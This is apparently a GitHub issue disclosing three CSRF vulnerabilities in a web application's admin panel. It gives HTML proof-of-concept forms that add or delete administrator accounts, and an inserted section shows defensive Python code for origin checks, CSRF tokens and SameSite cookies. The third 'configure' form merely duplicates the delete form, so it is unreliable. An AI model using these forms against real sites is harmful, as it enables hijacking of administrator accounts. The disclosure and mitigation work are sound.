There are three CSRF vulnerabilities that can add an administrator account, delete an administrator account, or edit the configuration. #352

Open
piaolin opened this issue Jul 27, 2020 · 0 comments

piaolin commented Jul 27, 2020

After the administrator has logged in, open the following three pages:

1. add_admin.html

Adds an administrator.

```html
<html>
  <body>
    <!-- cross-site POST: the browser attaches the logged-in admin's session cookie -->
    <form action="http://localhost:8888/admin/configure/users" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="email" value="321@com" />
      <input type="hidden" name="password" value="321" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

2. delete_admin.html

Deletes an administrator by username (email); the 'id' parameter is not used, so you can delete any user whose username (email) you know.

```html
<html>
  <body>
    <!-- the server deletes by 'email'; the 'id' value is ignored -->
    <form action="http://10.157.41.81:8888/admin/configure/users/delete" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="id" value="80" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

3. configure.html

It can edit the configuration, for example:

1. Change the HTTP Basic Auth user and password used to download a backup of your data via HTTP.
2. Change the administrator email, and use it together with add_admin.html.
3. Change the Client Secret, which is used to validate requests.

```html
<html>
  <body>
    <form action="http://10.157.41.81:8888/admin/configure/users/delete" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="id" value="80" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
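All three reports share one root cause: the admin endpoints accept a state-changing POST on the strength of the session cookie alone, and the browser attaches that cookie to a form posted from any site. The following is an added example (not the project's code, and not from the reporter) of the server-side check that closes this class of bug: reject state-changing requests whose Origin/Referer is not the application's own origin, require a per-session anti-CSRF token bound to the session, and mark the session cookie SameSite. The route, cookie name (`session`), field name (`csrf_token`) and origin `http://localhost:8888` are assumptions chosen to match the forms in the report; the request dicts are constructed to mimic the add_admin.html submission.

```python
import hmac
import hashlib
import secrets
from urllib.parse import urlsplit

# Constructed, illustrative values: the admin UI origin the PoC forms post to.
STATE_CHANGING_METHODS = {"POST", "PUT", "PATCH", "DELETE"}
ALLOWED_ORIGINS = {"http://localhost:8888"}


def issue_csrf_token(session_secret: bytes, session_id: str) -> str:
    """Per-session token (HMAC over the session id) to embed in every admin form."""
    return hmac.new(session_secret, session_id.encode(), hashlib.sha256).hexdigest()


def origin_allowed(headers: dict) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is our own origin."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False  # cannot attribute the request to a page: fail closed
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin in ALLOWED_ORIGINS


def is_csrf_safe(request: dict, session_secret: bytes) -> tuple:
    """Return (allowed, reason) for a request with method/headers/cookies/form keys."""
    if request["method"].upper() not in STATE_CHANGING_METHODS:
        return True, "read-only method"
    if not origin_allowed(request.get("headers", {})):
        return False, "origin not allowed"
    session_id = request.get("cookies", {}).get("session")
    if not session_id:
        return False, "no session"
    expected = issue_csrf_token(session_secret, session_id)
    submitted = request.get("form", {}).get("csrf_token", "")
    # constant-time comparison so token checking does not leak timing
    if not hmac.compare_digest(expected, submitted):
        return False, "csrf token mismatch"
    return True, "ok"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value that keeps the session cookie off cross-site POSTs."""
    return f"session={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


SECRET = secrets.token_bytes(32)  # constructed per-deployment secret
SESSION = "sess-demo-1"           # constructed session id

# Constructed request shaped like add_admin.html from the report: the
# browser sent the admin's cookie, but Origin is a third-party page and
# the form carries no token.
FORGED = {
    "method": "POST",
    "headers": {"Origin": "http://attacker.example"},
    "cookies": {"session": SESSION},
    "form": {"email": "321@com", "password": "321"},
}

# The same submission made from the admin UI itself, token included.
LEGIT = {
    "method": "POST",
    "headers": {"Origin": "http://localhost:8888"},
    "cookies": {"session": SESSION},
    "form": {"email": "321@com", "password": "321",
             "csrf_token": issue_csrf_token(SECRET, SESSION)},
}

if __name__ == "__main__":
    print(is_csrf_safe(FORGED, SECRET))  # (False, 'origin not allowed')
    print(is_csrf_safe(LEGIT, SECRET))   # (True, 'ok')
    print(session_cookie_header(SESSION))
```

The origin check alone would already stop the three forms above, since a page on another host cannot set Origin to the application's own value; the token check is kept as a second, independent control for clients that strip Origin and Referer, and SameSite=Lax stops the cookie from being attached to a cross-site POST in the first place. The delete report also notes that the server keys deletion on `email` while ignoring `id`; a CSRF fix does not change that, so the delete handler should additionally act only on the identifier it actually validates.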
@piaolin piaolin changed the title There is three CSRF vulnerability that can add the administrator account There is three CSRF vulnerability that can add the administrator account, delete administrator account, edit configuration. Jul 27, 2020